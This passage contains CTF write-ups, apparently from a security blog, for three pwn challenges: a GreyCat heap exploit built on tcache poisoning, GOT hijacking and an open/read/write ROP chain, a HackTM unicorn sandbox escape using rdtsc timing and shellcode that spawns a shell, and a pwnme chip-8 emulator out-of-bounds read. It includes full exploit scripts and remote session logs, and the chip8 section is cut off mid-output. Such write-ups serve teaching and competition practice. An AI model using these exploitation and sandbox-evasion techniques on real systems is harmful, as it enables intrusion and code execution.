  __int64 v1; // rdx
  int idx; // [rsp+Ch] [rbp-14h] BYREF
  ssize_t v4; // [rsp+10h] [rbp-10h]
  unsigned __int64 v5; // [rsp+18h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  puts("\nAt which index of the shelf would you like to rewrite your book?");
  printf("Index: ");
  __isoc99_scanf("%d", &idx);
  getchar();
  if ( idx > 0 && idx <= 10 && slot[2 * idx - 2] )
  {
    --idx;
    puts("Write me the new contents of your book that is no longer than what it was before.");
    v4 = read(0, slot[2 * idx], books[idx].size);
    v0 = (__int64 *)((char *)slot[2 * idx]->buf + v4);
    v1 = qword_4040D8;
    *v0 = author_signature;
    v0[1] = v1;
    puts("Your book has been rewritten!\n");
  }
  else
  {
    puts("Invaid slot!");
  }
  return v5 - __readfsqword(0x28u);
}

As you can read there is an out of bound write if we input books[idx].size bytes, indeed given the chunk stores only books[idx].size bytes the signature writes over the current chunk. And most of the time on the header (and especially the size) of the next chunk allocated in memory resulting an overlapping chunk.

Exploitation

Given we can get overlapping chunks we're able to do tcache poisoning on the 0x40 tcachebin (to deeply understand why I advice you to read the exploit and to run it into gdb). At this point we can simply write the first entry of @books that is stored at a fixed memory area within the binary (no PIE). In this new entry we could write a pointer to itself but with a large size in order to be able to write several entries of @books. When it is done we could write these entries:

    edit(1, pwn.flat([
            # 1==
            0xff, # sz
            exe.sym.stdout, # to leak libc
            # 2==
            0x8, # sz
            exe.got.free, # to do GOT hiijacking
            # 3==
            0x8, # sz
            exe.sym.secret_msg, # to be able to print an entry of @books
            # 4==
            0xff, # sz
            exe.sym.books # ptr to itself to be able to rewrite the entries when we need to do so
        ] + [0] * 0x60, filler = b"\x00"))

This way we can easily leak libc.

Leaking libc

Leaking libc is very easy given we already setup the entries of @books. We can replace free@GOT by puts@plt. This way the next time free will be called on an entry, it will leak the datas towards which the entry points. Which means free(book[1]) leaks the address of stdout within the libc.

STDOUT = 0x21a780

# [...]

def libc_leak_free(idx):
    io.sendlineafter(b"Option: ", b"3")
    io.sendlineafter(b"Index: ", str(idx).encode())
    return pwn.unpack(io.recvline().replace(b"\n", b"").ljust(8, b"\x00")) - STDOUT

# [...]

# libc leak
libc.address = libc_leak_free(1)
pwn.log.success(f"libc: {hex(libc.address)}")

Leaking the stack

Leaking the libc is cool but given the binary has a seccomp we cannot write one_gadgets on __malloc_hook or __free_hook or within the GOT (of the libc or of the binary) because of the seccomp. We have to do a ROPchain, to do so we could use setcontext but for this libc it is made around rdx that we do not control. Or we could simply leak environ to get the address of a stackframe from which we could return. That's what we gonna do on the rewrite_books stackframe.

def leak_environ(idx):
    io.sendlineafter(b"Option: ", b"3")
    io.sendlineafter(b"Index: ", str(idx).encode())
    return pwn.unpack(io.recvline().replace(b"\n", b"").ljust(8, b"\x00"))

# leak stack (environ)
edit(4, pwn.flat([
        # 1==
        0xff, # sz
        libc.sym.environ # target
    ], filler = b"\x00"))

environ = leak_environ(1)
pwn.log.success(f"environ: {hex(environ)}")

stackframe_rewrite = environ - 0x150
pwn.log.success(f"stackframe_rewrite: {hex(stackframe_rewrite)}")

ROPchain

Everything is ready for the ROPchain, we cannot use mprotect to use a shellcode within the seccomp forbids it. We just have to set the first entry to the stackframe we'd like to hiijack and that's it, then we just need call edit on this entry and the ROPchain is written and triggered at the return of the function!

rop = pwn.ROP(libc, base=stackframe_rewrite)

# setup the write to the rewrite stackframe
edit(4, pwn.flat([
        # 1==
        0xff, # sz
        stackframe_rewrite # target
    ], filler = b"\x00"))

# ROPchain
rop(rax=pwn.constants.SYS_open, rdi=stackframe_rewrite + 0xde + 2, rsi=pwn.constants.O_RDONLY) # open
rop.call(rop.find_gadget(["syscall", "ret"]))
rop(rax=pwn.constants.SYS_read, rdi=3, rsi=heap_leak, rdx=0x100) # file descriptor bf ...
rop.call(rop.find_gadget(["syscall", "ret"]))

rop(rax=pwn.constants.SYS_write, rdi=1, rsi=heap_leak, rdx=0x100) # write
rop.call(rop.find_gadget(["syscall", "ret"]))
rop.exit(0x1337)
rop.raw(b"/flag\x00")

print(rop.dump())
print(hex(len(rop.chain()) - 8))

# write and trigger the ROPchain
edit(1, rop.chain())

PROFIT

Finally:

nasm@off:~/Documents/pwn/greycat/writemeabook/dist$ python3 exploit.py REMOTE HOST=34.124.157.94 PORT=12346
[*] '/home/nasm/Documents/pwn/greycat/writemeabook/dist/chall'                                                                                                 
    Arch:     amd64-64-little  
    RELRO:    Partial RELRO
    Stack:    Canary found                                                                                                                 
    NX:       NX enabled
    PIE:      No PIE (0x3fd000)                                                                                                                      
    RUNPATH:  b'/home/nasm/Documents/pwn/greycat/writemeabook/dist'                                       
[*] '/home/nasm/Documents/pwn/greycat/writemeabook/dist/libc.so.6'                            
    Arch:     amd64-64-little                                                                                   
    RELRO:    Partial RELRO                                                                                                                
    Stack:    Canary found                                                                                                                   
    NX:       NX enabled                                                                                                                        
    PIE:      PIE enabled                                                                                                                         
[*] '/home/nasm/Documents/pwn/greycat/writemeabook/dist/ld-linux-x86-64.so.2' 
    Arch:     amd64-64-little                                                                        
    RELRO:    Partial RELRO                                                                                                                
    Stack:    No canary found                                                                                                                
    NX:       NX enabled                                                                                                                     
    PIE:      PIE enabled                                                                                                                         
[+] Opening connection to 34.124.157.94 on port 12346: Done                                                                               
[+] heap: 0x81a000                                                                                          
[*] Encrypted fp: 0x40484d
[+] libc: 0x7f162182f000                                                                                                                           
[+] environ: 0x7ffe60582c98
[+] stackframe_rewrite: 0x7ffe60582b48
[*] Loaded 218 cached gadgets for '/home/nasm/Documents/pwn/greycat/writemeabook/dist/libc.so.6'
0x7ffe60582b48:   0x7f1621874eb0 pop rax; ret                     
0x7ffe60582b50:              0x2 SYS_open
0x7ffe60582b58:   0x7f162185ae51 pop rsi; ret
0x7ffe60582b60:              0x0 O_RDONLY
0x7ffe60582b68:   0x7f16218593e5 pop rdi; ret
0x7ffe60582b70:   0x7ffe60582c28 (+0xb8)
0x7ffe60582b78:   0x7f16218c0396 syscall; ret
0x7ffe60582b80:   0x7f16218bf528 pop rax; pop rdx; pop rbx; ret
0x7ffe60582b88:              0x0 SYS_read
0x7ffe60582b90:            0x100
0x7ffe60582b98:      b'uaaavaaa' <pad rbx>
0x7ffe60582ba0:   0x7f162185ae51 pop rsi; ret
0x7ffe60582ba8:         0x81a000
0x7ffe60582bb0:   0x7f16218593e5 pop rdi; ret
0x7ffe60582bb8:              0x3
0x7ffe60582bc0:   0x7f16218c0396 syscall; ret
0x7ffe60582bc8:   0x7f16218bf528 pop rax; pop rdx; pop rbx; ret
0x7ffe60582bd0:              0x1 SYS_write
0x7ffe60582bd8:            0x100
0x7ffe60582be0:      b'naaboaab' <pad rbx>
0x7ffe60582be8:   0x7f162185ae51 pop rsi; ret
0x7ffe60582bf0:         0x81a000
0x7ffe60582bf8:   0x7f16218593e5 pop rdi; ret
0x7ffe60582c00:              0x1
0x7ffe60582c08:   0x7f16218c0396 syscall; ret
0x7ffe60582c10:   0x7f16218593e5 pop rdi; ret
0x7ffe60582c18:           0x1337 [arg0] rdi = 4919
0x7ffe60582c20:   0x7f16218745f0 exit
0x7ffe60582c28:     b'/flag\x00' b'/flag\x00'
0xde
[*] Switching to interactive mode
Your book has been rewritten!

grey{gr00m1ng_4nd_sc4nn1ng_th3_b00ks!!}
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb9\x81\x00\x00\x00\xb8\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb1\x81\x00\x00\x00\x00\x00\x00\x00\xc0\x81\x00\[*] Got EOF while reading in interactive
$ exit
$ 
[*] Closed connection to 34.124.157.94 port 12346
[*] Got EOF while sending in interactive

Conclusion

That was a nice medium heap challenge, even though that was pretty classic. You can find the tasks and the exploit here.

Annexes

Final exploit (with comments):

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# this exploit was generated via
# 1) pwntools
# 2) ctfmate

import os
import time
import pwn

BINARY = "chall"
LIBC = "/home/nasm/Documents/pwn/greycat/writemeabook/dist/libc.so.6"
LD = "/home/nasm/Documents/pwn/greycat/writemeabook/dist/ld-linux-x86-64.so.2"

# Set up pwntools for the correct architecture
exe = pwn.context.binary = pwn.ELF(BINARY)
libc = pwn.ELF(LIBC)
ld = pwn.ELF(LD)
pwn.context.terminal = ["tmux", "splitw", "-h"]
pwn.context.delete_corefiles = True
pwn.context.rename_corefiles = False
p64 = pwn.p64
u64 = pwn.u64
p32 = pwn.p32
u32 = pwn.u32
p16 = pwn.p16
u16 = pwn.u16
p8  = pwn.p8
u8  = pwn.u8

host = pwn.args.HOST or '127.0.0.1'
port = int(pwn.args.PORT or 1337)


def local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    if pwn.args.GDB:
        return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return pwn.process([exe.path] + argv, *a, **kw)


def remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = pwn.connect(host, port)
    if pwn.args.GDB:
        pwn.gdb.attach(io, gdbscript=gdbscript)
    return io


def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if pwn.args.LOCAL:
        return local(argv, *a, **kw)
    else:
        return remote(argv, *a, **kw)


gdbscript = '''
source /home/nasm/Downloads/pwndbg/gdbinit.py
'''.format(**locals())

HEAP_OFFT = 0x3d10
CHUNK3_OFFT = 0x3d50
STDOUT = 0x21a780

def encode_ptr(heap, offt, value):
    return ((heap + offt) >> 12) ^ value

import subprocess
def one_gadget(filename):
  return [int(i) for i in subprocess.check_output(['one_gadget', '--raw', filename]).decode().split(' ')]

def exp():

    io = start()

    def init(flip):
        io.sendlineafter(b"> ", flip)
    
    def add(idx, data: bytes):
        io.sendlineafter(b"Option: ", b"1")
        io.sendlineafter(b"Index: ", str(idx).encode())
        io.sendlineafter(b"Write me a book no more than 32 characters long!\n", data)

    def edit(idx, data):
        io.sendlineafter(b"Option: ", b"2")
        io.sendlineafter(b"Index: ", str(idx).encode())
        io.sendlineafter(b"Write me the new contents of your book that is no longer than what it was before.\n", data)

    def free(idx):
        io.sendlineafter(b"Option: ", b"3")
        io.sendlineafter(b"Index: ", str(idx).encode())

    def heapLeak(idx):
        io.sendlineafter(b"Option: ", b"1337")
        io.sendlineafter(b"What is your favourite number? ", str(idx).encode())
        io.recvuntil(b"You found a secret message: ")
        return int(io.recvline().replace(b"\n", b"").decode(), 16) - HEAP_OFFT

    def enable_print(idx):
        edit(idx, b"".join([
            pwn.p64(0)
        ]))

    def libc_leak_free(idx):
        io.sendlineafter(b"Option: ", b"3")
        io.sendlineafter(b"Index: ", str(idx).encode())
        return pwn.unpack(io.recvline().replace(b"\n", b"").ljust(8, b"\x00")) - STDOUT

    def leak_environ(idx):
        io.sendlineafter(b"Option: ", b"3")
        io.sendlineafter(b"Index: ", str(idx).encode())
        return pwn.unpack(io.recvline().replace(b"\n", b"").ljust(8, b"\x00"))

    init(b"m"*4 + pwn.p8(0x41))

    add(1, b"K"*0x10)
    heap_leak = heapLeak(1)
    pwn.log.success(f"heap: {hex(heap_leak)}")

    # victim
    add(2, b"")
    add(3, b"".join([   b"A"*0x10,
                        pwn.p64(0), # prev_sz
                        pwn.p64(0x21) # fake size
                    ]))
    
    add(4, b"".join([   b"A"*0x10,
                        pwn.p64(0), # prev_sz
                        pwn.p64(0x21) # fake size
                    ]))
    free(4) # count for 0x40 tcachebin = 1

    # chunk2 => sz extended
    edit(1, b"K"*0x20)
    # chunk2 => tcachebin 0x40, count = 2
    free(2)

    # oob write over chunk3, we keep valid header
    add(2, b"".join([   pwn.p64(0)*3,
                        pwn.p64(0x41) # valid size to end up in the 0x40 tcache bin
                    ])) # count = 1

    # chunk3 => 0x40 tcachebin, count = 2
    free(3)

    pwn.log.info(f"Encrypted fp: {hex(encode_ptr(heap_leak, CHUNK3_OFFT, exe.got.printf))}")

    # tcache poisoning
    edit(2, b"".join([   pwn.p64(0)*3,
                         pwn.p64(0x41), # valid size
                         pwn.p64(encode_ptr(heap_leak, CHUNK3_OFFT, exe.sym.books)) # forward ptr
                     ]))

    # dumb
    add(3, b"A"*0x20) # count = 1

    # arbitrary write to @books, this way books[1] is user controlled
    add(4, b"".join([
        pwn.p64(0x1000), # sz
        pwn.p64(exe.sym.books), # target
        b"P"*0x10
    ])) # count = 0

    # we can write way more due to the previous call
    edit(1, pwn.flat([
            # 1==
            0xff, # sz
            exe.sym.stdout, # target
            # 2==
            0x8, # sz
            exe.got.free, # target
            # 3==
            0x8, # sz
            exe.sym.secret_msg, # target
            # 4==
            0xff, # sz
            exe.sym.books # target
        ] + [0] * 0x60, filler = b"\x00"))
    
    # free@got => puts
    edit(2, b"".join([
            pwn.p64(exe.sym.puts)
        ]))
    
    # can print = true
    enable_print(3)

    # libc leak
    libc.address = libc_leak_free(1)
    pwn.log.success(f"libc: {hex(libc.address)}")

    # leak stack (environ)
    edit(4, pwn.flat([
            # 1==
            0xff, # sz
            libc.sym.environ # target
        ], filler = b"\x00"))

    environ = leak_environ(1)
    pwn.log.success(f"environ: {hex(environ)}")

    stackframe_rewrite = environ - 0x150
    pwn.log.success(f"stackframe_rewrite: {hex(stackframe_rewrite)}")

    rop = pwn.ROP(libc, base=stackframe_rewrite)

    # setup the write to the rewrite stackframe
    edit(4, pwn.flat([
            # 1==
            0xff, # sz
            stackframe_rewrite # target
        ], filler = b"\x00"))

    # ROPchain
    rop(rax=pwn.constants.SYS_open, rdi=stackframe_rewrite + 0xde + 2, rsi=pwn.constants.O_RDONLY) # open
    rop.call(rop.find_gadget(["syscall", "ret"]))
    rop(rax=pwn.constants.SYS_read, rdi=3, rsi=heap_leak, rdx=0x100) # file descriptor bf ...
    rop.call(rop.find_gadget(["syscall", "ret"]))

    rop(rax=pwn.constants.SYS_write, rdi=1, rsi=heap_leak, rdx=0x100) # write
    rop.call(rop.find_gadget(["syscall", "ret"]))
    rop.exit(0x1337)
    rop.raw(b"/flag\x00")

    print(rop.dump())
    print(hex(len(rop.chain()) - 8))

    # write and trigger the ROPchain
    edit(1, rop.chain())
    
    io.interactive()

if __name__ == "__main__":
    exp()

[HackTM finals 2023 - pwn] cs2101

Mon, 15 May 2023 00:00:00 GMT

cs2101

cs2101 is shellcoding / unicorn sandbox escape challenge I did during the HackTM finals.

What we have

The challenge is splitted into three file: the server, the unicorn callback based checker and the final C program that runs the shellcode without any restrictions. Let's take a look at the server:

#!/usr/bin/env python3

import os
import sys
import base64
import tempfile
from sc_filter import emulate

def main():
    encoded = input("Enter your base64 encoded shellcode:\n")
    encoded+= '======='
    try:
        shellcode = base64.b64decode(encoded)
    except:
        print("Error decoding your base64")
        sys.exit(1)

    if not emulate(shellcode):
        print("I'm not letting you hack me again!")
        return

    with tempfile.NamedTemporaryFile() as f:
        f.write(shellcode) 
        f.flush()

        name = f.name
        os.system("./emulate {}".format(name))
        


if __name__ == '__main__':
    main()

The server is asking for a shellcode encoded in base64, then it is checking some behaviours of the shellcode by running it into unicorn through the emulate function and if it does not fail the shellcode is run by the emulate C program. Now let's take a quick look at the unicorn checker:

#!/usr/bin/env python3

from unicorn import *
from unicorn.x86_const import *


# memory address where emulation starts
ADDRESS = 0x1000000


def main():
    with open("sc.bin", "rb") as f:
        code = f.read()

    if emulate(code):
        print("Done emulating. Passed!")
    else:
        print("Done emulating. Failed!")


def emulate(code):
    try:
        # Initialize emulator in X86-64bit mode
        mu = Uc(UC_ARCH_X86, UC_MODE_64)

        # map memory
        mu.mem_map(ADDRESS, 0x1000)

        # shellcode to test
        mu.mem_write(ADDRESS, code)

        # initialize machine registers
        mu.reg_write(UC_X86_REG_RAX, ADDRESS)
        mu.reg_write(UC_X86_REG_RFLAGS, 0x246)

        # initialize hooks
        allowed = [True]
        mu.hook_add(UC_HOOK_INSN, syscall_hook, allowed, 1, 0, UC_X86_INS_SYSCALL)
        mu.hook_add(UC_HOOK_CODE, code_hook, allowed)

        # emulate code in infinite time & unlimited instructions
        mu.emu_start(ADDRESS, ADDRESS + len(code))

        return allowed[0]

    except UcError as e:
        print("ERROR: %s" % e)


def syscall_hook(mu, user_data):
    # Syscalls are dangerous!
    print("not allowed to use syscalls")
    user_data[0] = False


def code_hook(mu, address, size, user_data):
    inst = mu.mem_read(address, size)

    # CPUID (No easy wins here!)
    if inst == b'\x0f\xa2':
        user_data[0] = False
        print("CPUID")

if __name__ == '__main__':
    main()

To succeed the check in the server our shellcode should match several conditions: first there should not be any syscalls / cpuid instructions, then it should exit (and return allowed[0] === true) without triggering an exception not handled by unicorn (for example SIGSEGV or an interrupt not handled like int 0x80. And if it does so the shellcode is ran by this program:

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>

#define ADDRESS ((void*)0x1000000)

/* gcc emulate.c -o emulate -masm=intel */

int main(int argc, char **argv) {
    if (argc < 2) {
        fprintf(stderr, "Usage: %s <filename>\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    void *code = mmap(ADDRESS, 0x1000,
                      PROT_READ | PROT_WRITE | PROT_EXEC,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

    if (code == MAP_FAILED) {
        perror("mmap");
        exit(EXIT_FAILURE);
    }

    char *filename = argv[1];
    int fd = open(filename, O_RDONLY);
    if (fd == -1) {
        perror("open");
        exit(EXIT_FAILURE);
    }

    read(fd, code, 0x1000);
    close(fd);

    __asm__ volatile (
        "lea rcx, [rsp-0x1800]\n\t"
        "fxrstor [rcx]\n\t"
        "xor rbx, rbx\n\t"
        "xor rcx, rcx\n\t"
        "xor rdx, rdx\n\t"
        "xor rdi, rdi\n\t"
        "xor rsi, rsi\n\t"
        "xor rbp, rbp\n\t"
        "xor rsp, rsp\n\t"
        "xor r8, r8\n\t"
        "xor r9, r9\n\t"
        "xor r10, r10\n\t"
        "xor r11, r11\n\t"
        "xor r12, r12\n\t"
        "xor r13, r13\n\t"
        "xor r14, r14\n\t"
        "xor r15, r15\n\t"
        "jmp rax\n\t"
        :
        : "a" (code)
        :
    );
}

If we succeed to run the shellcode within this program we could easily execute syscalls and then drop a shell.

Bypass the sandbox

The first step is to make our shellcode aware of the environment inside which it is running. A classic trick to achieve this is to use the rdtsc instruction (technical spec here). According to the documentation, it:

Reads the current value of the processor’s time-stamp counter (a 64-bit MSR) into the EDX:EAX registers. The EDX register is loaded with the high-order 32 bits of the MSR and the EAX register is loaded with the low-order 32 bits. (On processors that support the Intel 64 architecture, the high-order 32 bits of each of RAX and RDX are cleared.)

Given within a debugger / emulator (depends on what is hooked actually, in an emulator it could be easily handled) the time between the execution of two instructions is very long we could check that the shellcode is ran casually by the C program without being hooked at each instruction (as it is the case in the unicorn sandbox) just by checking that the amount of time between two instructions is way shorter than in the sandbox. This way we can trigger a different code path in the shellcode according to the environment inside which it is run.

The second step is about being able to leave the sandbox without any syscalls with a handled exception that will not throw an error. By reading the unicorn source code for a while I saw a comment that talked about the hlt instruction, then I tried to use it to shutdown the shellcode when it is run by the sandbox and it worked pretty good.

PROFIT

Putting it all together we manage to get the flag:

[root@(none) chal]# nc 34.141.16.87 10000
Enter your base64 encoded shellcode:
DzFJicBIweIgSQnQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQDzFJicFIweIgSQnRTSnBSYH5AAEAAH8JSMfAagAAAf/g9EjHxAAAAAFIgcQABQAAamhIuC9iaW4vLy9zUEiJ52hyaQEBgTQkAQEBATH2VmoIXkgB5lZIieYx0mo7WA8F
id
uid=1000(user) gid=1000(user) groups=1000(user)
ls
emulate
flag.txt
requirements.txt
run
sc_filter.py
server.py
cat flag.txt
HackTM{Why_can't_you_do_your_homework_normally...}

Final exploit

Final epxloit:

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# this exploit was generated via
# 1) pwntools
# 2) ctfmate

import os
import time
import pwn

BINARY = "emulate"
LIBC = "/usr/lib/libc.so.6"
LD = "/lib64/ld-linux-x86-64.so.2"

# Set up pwntools for the correct architecture
exe = pwn.context.binary = pwn.ELF(BINARY)
libc = pwn.ELF(LIBC)
ld = pwn.ELF(LD)
pwn.context.terminal = ["tmux", "splitw", "-h"]
pwn.context.delete_corefiles = True
pwn.context.rename_corefiles = False
p64 = pwn.p64
u64 = pwn.u64
p32 = pwn.p32
u32 = pwn.u32
p16 = pwn.p16
u16 = pwn.u16
p8  = pwn.p8
u8  = pwn.u8

host = pwn.args.HOST or '127.0.0.1'
port = int(pwn.args.PORT or 1337)

FILENAME = "shellcode"

def local(argv=["shellcode"], *a, **kw):
    '''Execute the target binary locally'''
    if pwn.args.GDB:
        return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return pwn.process([exe.path] + argv, *a, **kw)


def remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = pwn.connect(host, port)
    if pwn.args.GDB:
        pwn.gdb.attach(io, gdbscript=gdbscript)
    return io


def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if pwn.args.LOCAL:
        return local(argv, *a, **kw)
    else:
        return remote(argv, *a, **kw)


gdbscript = '''
continue
'''.format(**locals())

import base64

def exp():
    f = open("shellcode", "wb")

    shellcode = pwn.asm( 
        "rdtsc\n"
        "mov r8, rax\n"
        "shl rdx, 32\n"
        "or r8, rdx\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "nop\n"
        "rdtsc\n"
        "mov r9, rax\n"
        "shl rdx, 32\n"
        "or r9, rdx\n"
        
        "sub r9, r8\n"
        "cmp r9, 0x100\n"
        "jg sandbox\n"
        
        "mov rax, 0x100006a\n"
        "jmp rax\n"

        "sandbox:\n"
        "hlt\n"
    )

    map_stack = pwn.asm("mov rsp, 0x1000000\n")
    map_stack += pwn.asm("add rsp, 0x500\n")
    
    shell = pwn.asm(pwn.shellcraft.amd64.linux.sh())

    print(shellcode + map_stack + shell)
    print(base64.b64encode(shellcode + map_stack + shell))
    f.write(shellcode + map_stack + shell)


if __name__ == "__main__":
    exp()

[pwnme 2023 - pwn] chip8

Mon, 08 May 2023 00:00:00 GMT

chip8

Solves: 24 Easy

I just found a repo of a chip-8 emulator, it may be vulnerable but I didn't had enough time to report the vulnerability with a working PoC. You must find a way to get the flag in memory on the remote service !

Author: Express#8049

Remote service at : nc 51.254.39.184 1337

chip8 is a emulator-pwn challenge I did during the pwnme CTF . You can find the related files here.

Code review

This challenge is based on an emulator called c8emu that is updated with these lines of code:

diff --git a/include/Machine.hpp b/include/Machine.hpp
index af3d0d7..4288e15 100644
--- a/include/Machine.hpp
+++ b/include/Machine.hpp
@@ -17,6 +17,7 @@ class Machine{
 private:
 	std::vector<uint8_t> registers; // V0-VF
 	std::vector<uint8_t> memory; // Memory
+	std::vector<uint8_t> flag;
 	uint16_t I; // Index register
 	std::vector<uint16_t> stack; // Stack
 	uint8_t SP; // Stack Pointer
diff --git a/src/Machine.cpp b/src/Machine.cpp
index d34680e..2321296 100644
--- a/src/Machine.cpp
+++ b/src/Machine.cpp
@@ -6,10 +6,13 @@
 #include <chrono>
 #include <thread>
 
+std::string FLAG = "PWNME{THIS_IS_A_SHAREHOLDER_AAAAAAAAAAAAAAAAAA}";
+
 Machine::Machine(){
 	registers = std::vector<uint8_t>(16, 0);
 	stack = std::vector<uint16_t>(32, 0);
 	memory = std::vector<uint8_t>(4096, 0);
+	flag = std::vector<uint8_t>(128, 0);
 	PC = 0x200;
 	last_tick = std::chrono::steady_clock::now();
 	I = 0;
@@ -134,8 +137,8 @@ void Machine::execute(uint16_t& opcode){

 	if(it != first_match.end()) (it->second)(opcode);
 	else {
-		std::cout << "No match found for opcode " << std::hex << (int) opcode << "\n";
-		std::cout << "This could be because this ROM uses SCHIP or another extension which is not yet supported.\n";
+		//std::cout << "No match found for opcode " << std::hex << (int) opcode << "\n";
+		//std::cout << "This could be because this ROM uses SCHIP or another extension which is not yet supported.\n";
 		std::exit(0);
 	}
 }
@@ -179,12 +182,13 @@ void Machine::print_machine_state(){
 }
 
 void Machine::runLoop(){
+	std::copy(FLAG.begin(), FLAG.end(), flag.begin());
 	while(true){
 		// Update display
 		if(ge.is_dirty()){ // Check if the screen has to be updated
 			ge.update_display();
-			print_machine_state();
-			std::cout << "Opcode " << ((uint16_t) (memory[PC]<<8) | (memory[PC+1])) << "\n";
+			//print_machine_state();
+			//std::cout << "Opcode " << ((uint16_t) (memory[PC]<<8) | (memory[PC+1])) << "\n";
 		}
 
 		// Update the keyboard buffer to check for all pressed keys
diff --git a/src/c8emu.cpp b/src/c8emu.cpp
index e65123b..590228e 100644
--- a/src/c8emu.cpp
+++ b/src/c8emu.cpp
@@ -17,6 +17,10 @@ void loadFile(const std::string& filename, std::vector<uint8_t>& prog){
 int main(int argc, char ** argv){
 	Machine machine;
 
+	setbuf(stdin, NULL);
+	setbuf(stdout, NULL);
+	setbuf(stderr, NULL);
+
 	{ // Create block to deallocate the possibly large variable prog
 		// Load Instructions
 		std::vector<uint8_t> prog;

As you can see above, the prints that can leak informations about the program execution are removed, and an array named flag (on the heap) is inserted right after the memory mapping of length 0x1000 (on the heap) of the chip8 program. This way the goal would be to be able to leak the content of flag onto the screen.

few words on chip8 architecture

To get a quick overview of the chip8 arch, I advice you to read this. Here are the most important informations from the technical reference:

Chip-8 is a simple, interpreted, programming language which was first used on some do-it-yourself computer systems in the late 1970s and early 1980s. The COSMAC VIP, DREAM 6800, and ETI 660 computers are a few examples. These computers typically were designed to use a television as a display, had between 1 and 4K of RAM, and used a 16-key hexadecimal keypad for input. The interpreter took up only 512 bytes of memory, and programs, which were entered into the computer in hexadecimal, were even smaller.
Chip-8 has 16 general purpose 8-bit registers, usually referred to as Vx, where x is a hexadecimal digit (0 through F). There is also a 16-bit register called I. This register is generally used to store memory addresses, so only the lowest (rightmost) 12 bits are usually used.
Here are the instruction we need:
- Annn - LD I, addr. Set I = nnn. The value of register I is set to nnn.
- 6xkk - LD Vx, byte, Set Vx = kk. The interpreter puts the value kk into register Vx.
- Fx1E - ADD I, Vx. Set I = I + Vx. The values of I and Vx are added, and the results are stored in I.
- Dxyn - DRW Vx, Vy, nibble. Display n-byte sprite starting at memory location I at (Vx, Vy), set VF = collision. The interpreter reads n bytes from memory, starting at the address stored in I. These bytes are then displayed as sprites on screen at coordinates (Vx, Vy). Sprites are XORed onto the existing screen. If this causes any pixels to be erased, VF is set to 1, otherwise it is set to 0. If the sprite is positioned so part of it is outside the coordinates of the display, it wraps around to the opposite side of the screen. See instruction 8xy3 for more information on XOR, and section 2.4, Display, for more information on the Chip-8 screen and sprites.

n or nibble - A 4-bit value, the lowest 4 bits of the instruction
x - A 4-bit value, the lower 4 bits of the high byte of the instruction
y - A 4-bit value, the upper 4 bits of the low byte of the instruction
kk or byte - An 8-bit value, the lowest 8 bits of the instruction

The bug

The bug lies into the implementation around the instruction that use the I register. Indeed, as you read above, the I register is 16 bits wide. Thus we could we print onto the screen with the help of the DRW instruction data stored from memory[I=0] up to memory[I=2^16 - 1]. Let's see how does it handle the DRW instruction:

// https://github.com/LakshyAAAgrawal/chip8emu/blob/master/src/Machine.cpp#L123

{0xd000, [this](uint16_t& op){ // TODO - Dxyn - DRW Vx, Vy, nibble
    registers[0xf] = ge.draw_sprite(memory.begin() + I, memory.begin() + I + (op & 0x000f), registers[(op & 0x0f00)>>8] % 0x40, registers[(op & 0x00f0)>>4] % 0x20);
}}

The first and the second argument are the begin and the end of the location where data to print are stored. (op & 0x000f) represents the amount of bytes we'd like to print. As you can see no checks are performed, this way we able to get a read out of bound from from memory[I=0] up to memory[I=2^16 - 1].

Exploitation

Now we now how we could exfiltrate the flag we can write this tiny chip8 program:

code = [
    0xAFFF, # Annn - LD I, addr, I  = 0xfff
    0x6111, # 6xkk - LD Vx, byte, R1 = 0x11
    0xF11E, # ADD I, R1, I => 0x1010
    0xDBCF  # Write on screen (xored with current pixels) 15 bytes from I=0x1010
]

We read the flag from memory[0x1010] given memory is adjacent to the flag (memory[0x1000] == begin of the chunk flag within the heap), and we add 0x10 to read the chunk content which is right after the header (prev_sz and chunk_sz). Once we launch it we get:

python3 exploit.py REMOTE HOST=51.254.39.184 PORT=1337
[*] '/media/nasm/7044d811-e1cd-4997-97d5-c08072ce9497/ret2school/ctf/2023/pwnme/pwn/chip8/wrapper'
    Arch:     amd64-64-little
╔════════════════════════════════════════════════════════════════╗
║ █ █ ▄▄▄                                                        ║
║ █  ██▀▄                                                        ║
║ █▄▄▄▀▄█                                                        ║
║ █  ▄ ▀▀                                                        ║
